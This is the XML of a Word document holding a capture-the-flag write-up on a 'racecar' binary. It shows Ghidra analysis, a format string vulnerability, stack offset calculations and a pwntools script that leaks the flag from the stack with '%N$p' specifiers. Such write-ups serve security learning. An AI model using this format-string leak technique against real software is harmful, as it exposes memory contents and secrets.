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1440" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203"/>
    <w:p w14:paraId="5CACB531" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203"/>
    <w:p w14:paraId="43609F2B" w14:textId="27C06DF0" w:rsidR="00C51203" w:rsidRDefault="00C51203">
      <w:r>
        <w:t xml:space="preserve">The write explains how to exploit “format string vulnerability” </w:t>
      </w:r>
      <w:r w:rsidR="008B3679">
        <w:t>and obtain the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1B677" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203"/>
    <w:p w14:paraId="2AED1D44" w14:textId="175DF284" w:rsidR="00C51203" w:rsidRDefault="00C51203">
      <w:r w:rsidRPr="00C51203">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2D60DD" wp14:editId="3E45B2B3">
            <wp:extent cx="5731510" cy="2292985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9262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54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C6C0" w14:textId="68B00299" w:rsidR="00951D8E" w:rsidRDefault="00951D8E">
      <w:r>
        <w:t>Do a check the security controls on the binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7668F8AF" w14:textId="77777777" w:rsidR="00951D8E" w:rsidRDefault="00951D8E"/>
    <w:p w14:paraId="4752546C" w14:textId="422B28A7" w:rsidR="00951D8E" w:rsidRDefault="00951D8E">
      <w:r w:rsidRPr="00951D8E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CC368BC" wp14:editId="3F95B483">
            <wp:extent cx="4450466" cy="1691787"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="169084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44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5C45" w14:textId="77777777" w:rsidR="00951D8E" w:rsidRDefault="00951D8E"/>
    <w:p w14:paraId="4197B0C5" w14:textId="5A25DCFC" w:rsidR="00951D8E" w:rsidRDefault="00951D8E">
      <w:r>
        <w:t>Load the binary in Ghidra to check the contents of the binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B33FE" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203"/>
    <w:p w14:paraId="75EA3937" w14:textId="42A27CFE" w:rsidR="00C51203" w:rsidRDefault="00C51203">
      <w:r w:rsidRPr="00C51203">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EA1FF40" wp14:editId="556D5DC4">
            <wp:extent cx="6240780" cy="3208020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122153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37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4975" w14:textId="77777777" w:rsidR="00951D8E" w:rsidRDefault="00951D8E" w:rsidP="00C51203">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C882EF" w14:textId="3C80E781" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By looking at the contents of the binary, we could see in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>car_menu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function, Once the user wins the race, He is asked to input a data to provide for press which gets printed to the output using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(__format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504D955" w14:textId="09D0661E" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a format string vulnerability that leaks the addresses on the stack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F07AD0" w14:textId="15E855CF" w:rsidR="00C51203" w:rsidRPr="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51203">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>But, do we really have some useful input on the stack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C873365" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5912B42E" w14:textId="5AEB3CE3" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look at the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function that opens the flag.txt in read mode and stores the data in __stream, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> functions places that data in the buffer local_3c variable identified in Ghidra which is 44 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424221CF" w14:textId="530FBD8C" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>So, the flag is placed on the stack as the buffer is written with the contents of flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E078C" w14:textId="491C4459" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The buffer is 44 bytes size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A04C32" w14:textId="77DC4E85" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Now, we need to find a way to win the race</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78EE5F" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203"/>
    <w:p w14:paraId="666DA9FC" w14:textId="5C6B99F1" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:r w:rsidRPr="00C51203">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26FD893F" wp14:editId="18616384">
            <wp:extent cx="5731510" cy="4540250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47693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32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3A57" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203"/>
    <w:p w14:paraId="17BDA3B1" w14:textId="42290F61" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Could see that the user is allowed to enter the input after he wins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F04454" w14:textId="09A49CC6" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From the code disassembled from GHIDRA, we could see that flag.txt is present on local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B21745" w14:textId="2F21E186" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>So, I have created a dummy file with flag.txt with just 4 bytes of “AAAA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>” .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E638A18" w14:textId="65B8EAE8" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The position of AAAA displaced on the stack defines the starting point of the buffer and the ending point of buffer is 44/4 + starting offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C87A9" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5210F99A" w14:textId="7D74DF9E" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C51203">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07B3B3AE" wp14:editId="7940C0D1">
            <wp:extent cx="6083300" cy="1022350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100192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23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67BB" w14:textId="3E13EB8E" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507CF0E5" w14:textId="5F436AF5" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The starting position of the buffer is the 12</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51203">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> position on the stack and hence the last offset of the stack is 12+44/4 = 12+11 = 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025690C3" w14:textId="44FD4D5D" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>So, we need to leak the address from offset 12 to 23 with string “%12$p ------%23$p”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E535B95" w14:textId="68D03068" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Below I have presented a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tools script to do the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D721A94" w14:textId="77777777" w:rsidR="007F7033" w:rsidRDefault="007F7033" w:rsidP="007F7033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D10BBF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lastRenderedPageBreak/>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC9003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from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pwn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import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0DEDC1B9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import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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="752D88A1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import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time,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traceback, sys,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EDF920E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import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binascii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 array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F30FCF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from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textwrap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import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wrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B24141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def start(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argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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], *a, **kw):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E3846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if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pwn.args.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GDB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# use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 script, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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 apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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gdbserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4641B137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return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pwn.gdb.debug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binPath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]+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gdbscript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gdbscript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aslr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False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 *a, **kw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61387860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pwn.args</w:t>
      </w:r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REMOTE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# ['server', 'port']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6EDC35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return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pwn.remote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sys.argv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1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sys.argv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2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], *a, **kw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E02B539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else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# run locally, no GDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF08A0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return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pwn.process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binPath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]+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argv,aslr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True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 *a, **kw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AAF74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# Set up the target binary and the remote server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199B9FF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binary = ELF(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racecar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1816911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binPath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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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racecar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA88DB6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#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79516577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io = process(</w:t>
      </w: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binary.path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2AE8B14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build</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F703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 in GDB support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A5A0E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gdbscript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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD921E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init-pwndbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38DB6A3B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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54873166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''</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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.format</w:t>
      </w:r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(**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locals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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617EF955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p=</w:t>
      </w:r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start(</w:t>
      </w:r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F302591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payload = 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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E16E6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offset =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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E614C9E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end </w:t>
      </w:r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  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75C54C25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for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in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range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12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23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2D07264C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payload+= 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"%"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+str(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)+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"$p "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654F905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p.recvuntil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b'Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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: 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4E1EC44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p.sendline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b'sai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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A31B010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p.recvuntil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b'Nickname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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: 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F3C3AF8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p.sendline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b'sai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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4AEF7D1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p.recvuntil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b'&gt; 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765B77D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p.sendline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b'2'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43CF07B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p.recvuntil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b'&gt; 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0E26FC2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p.sendline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b'1'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9E62D7C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p.recvuntil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b'&gt; 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E6BB6E0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p.sendline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b'2'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5539E7F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p.recvuntil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b'&gt; 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3F42FFF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p.sendline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(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E23CE0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p.recv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7746454C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response = </w:t>
      </w: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p.recv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5DDD726A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flag = (</w:t>
      </w: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response.decode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"utf-8"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).split(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'm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\n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'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))[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1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</w:p>
    <w:p w14:paraId="137B2573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flag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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flag.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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7658778E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recvd_flag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""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF6711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values </w:t>
      </w:r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in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flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51C0FC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recvd_flag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+=</w:t>
      </w:r>
      <w:proofErr w:type="gram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pwn.p</w:t>
      </w:r>
      <w:proofErr w:type="gram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32(int(values,</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7033">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F0EC00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>16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)).decode(</w:t>
      </w:r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"utf-8"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46533CE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981186B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7F7033">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="CC00FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>print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>recieved</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7033">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="00A71C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is:"</w:t>
      </w:r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recvd_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F703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8926549" w14:textId="77777777" w:rsidR="007F7033" w:rsidRPr="007F7033" w:rsidRDefault="007F7033" w:rsidP="007F7033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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88676DF" w14:textId="4EF51CC8" w:rsidR="007F7033" w:rsidRDefault="007F7033" w:rsidP="007F7033"/>
    <w:p w14:paraId="2007681F" w14:textId="019C9BD3" w:rsidR="007F7033" w:rsidRDefault="007F7033" w:rsidP="007F7033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The payload is sent and the response is converted from str to integer and the flag is obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15438619" w14:textId="77777777" w:rsidR="007F7033" w:rsidRDefault="007F7033" w:rsidP="007F7033"/>
    <w:p w14:paraId="306CD675" w14:textId="094EDE7F" w:rsidR="007F7033" w:rsidRDefault="008B3679" w:rsidP="007F7033">
      <w:r w:rsidRPr="008B3679">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BA5DCB" wp14:editId="1ED9430F">
            <wp:extent cx="5731510" cy="1508760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="110183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34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D8B3" w14:textId="77777777" w:rsidR="008B3679" w:rsidRDefault="008B3679" w:rsidP="007F7033"/>
    <w:p w14:paraId="0EB1D87A" w14:textId="7BC750E1" w:rsidR="008B3679" w:rsidRDefault="008B3679" w:rsidP="008B3679">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On execution we could see flag is obtained and the machine is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7070F3D4" w14:textId="0EDE0FE5" w:rsidR="008B3679" w:rsidRDefault="008B3679" w:rsidP="008B3679">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We have used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tubes p32 to convert the data back from little endian to original format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3478C8" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203"/>
    <w:p w14:paraId="001A3654" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203"/>
    <w:p w14:paraId="4D6B948B" w14:textId="77777777" w:rsidR="00C51203" w:rsidRDefault="00C51203" w:rsidP="00C51203">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C5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9B1F" w14:textId="77777777" w:rsidR="004C5723" w:rsidRDefault="004C5723" w:rsidP="00C51203">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7E01A0E2" w14:textId="77777777" w:rsidR="004C5723" w:rsidRDefault="004C5723" w:rsidP="00C5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B6BF" w14:textId="77777777" w:rsidR="004C5723" w:rsidRDefault="004C5723" w:rsidP="00C51203">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14DC7253" w14:textId="77777777" w:rsidR="004C5723" w:rsidRDefault="004C5723" w:rsidP="00C5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325"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B076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F788D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D1A9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C5BAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDE85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0C6F9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C49AF9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0977CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B3C2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34DB5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C87E2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530893">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="543442152">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="805010117">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1942452943">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1175076665">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="164783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8E"/>
    <w:rsid w:val="00026007"/>
    <w:rsid w:val="004C5723"/>
    <w:rsid w:val="007F7033"/>
    <w:rsid w:val="008B3679"/>
    <w:rsid w:val="00951D8E"/>
    <w:rsid w:val="00C51203"/>
    <w:rsid w:val="00C84456"/>
    <w:rsid w:val="00F9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DE46"/>
  <w15:docId w15:val="{D3F3F125-63FB-4155-9003-178ADC58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03"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C5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Bharath</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sai Bharath</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-16T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-16T08:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>